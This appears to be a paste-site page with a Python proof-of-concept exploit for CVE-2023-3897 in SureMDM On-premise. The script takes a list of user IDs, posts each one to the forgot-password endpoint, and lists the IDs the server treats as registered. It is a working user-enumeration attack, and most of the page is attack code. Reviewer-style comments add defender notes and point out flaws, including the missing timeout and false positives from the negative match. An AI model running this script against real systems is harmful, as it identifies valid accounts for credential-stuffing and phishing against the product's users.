FlyFar

SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration - CVE-2023-3897

Feb 22nd, 2024
Python 1.70 KB | Cybersecurity | 0 0
  1. # Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
  2. # Date: 05/12/2023
  3. # Exploit Author: Jonas Benjamin Friedli
  4. # Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
  5. # Version: <= 6.31
  6. # Tested on: 6.31
  7. # CVE : CVE-2023-3897
  8.  
  9. import requests
  10. import sys
  11.  
  def print_help():
      """Print the command-line usage string and exit with status 1."""
      usage = "Usage: python script.py [URL] [UserListFile]"
      print(usage)
      # Equivalent to sys.exit(1): every caller treats help output as a
      # terminating path, so nothing after this call runs.
      raise SystemExit(1)
  15.  
  16.  
  def main():
      """Check which IDs from a list the forgot-password endpoint treats as registered.

      Reads the base URL and a user-list file from the command line, posts each
      ID as JSON to ``/ForgotPassword.aspx/ForgetPasswordRequest`` and records
      the IDs whose reply does not carry the "not registered" message. The page
      title describes this as reaching the endpoint without the CAPTCHA step
      (CVE-2023-3897); that is taken from the title, not shown by this code.

      Defender view: the signal in server logs is a run of POSTs to this path
      with a changing ``UserId`` from one client. The durable fix is a reply
      that does not differ between registered and unregistered IDs, with any
      CAPTCHA or rate limit enforced server-side on this endpoint; see the
      vendor advisory for the fixed release.
      """
      args = sys.argv
      if len(args) != 3 or args[1] == '-h':
          print_help()

      url = args[1]
      user_list_file = args[2]

      try:
          with open(user_list_file, 'r') as handle:
              users = handle.read().splitlines()
      except FileNotFoundError:
          print(f"User list file '{user_list_file}' not found.")
          sys.exit(1)

      endpoint = url + "/ForgotPassword.aspx/ForgetPasswordRequest"
      not_registered = "This User ID/Email ID is not registered."
      request_headers = {"Content-Type": "application/json; charset=utf-8"}
      total = len(users)
      valid_users = []

      for position, user in enumerate(users, start=1):
          percent = position / total * 100
          print(f"Processing {position}/{total} users ({percent:.2f}%)", end="\r")

          # NOTE(review): no timeout is passed, so one stalled reply blocks the run.
          response = requests.post(endpoint, json={"UserId": user}, headers=request_headers)
          if response.status_code != 200:
              continue

          # NOTE(review): the test is negative. Any HTTP 200 whose d.message lacks
          # the "not registered" text is counted, so a generic error or throttling
          # message would be reported as a registered ID. A non-JSON body or a
          # null "d" raises here rather than being skipped.
          message = response.json().get('d', {}).get('message', '')
          if not_registered not in message:
              valid_users.append(user)

      print("\nFinished processing users.")
      print(f"Valid Users Found: {len(valid_users)}")
      for user in valid_users:
          print(user)
  # Run the check only when the file is executed as a script; importing the
  # module for review or testing sends no requests.
  if __name__ == "__main__":
      main()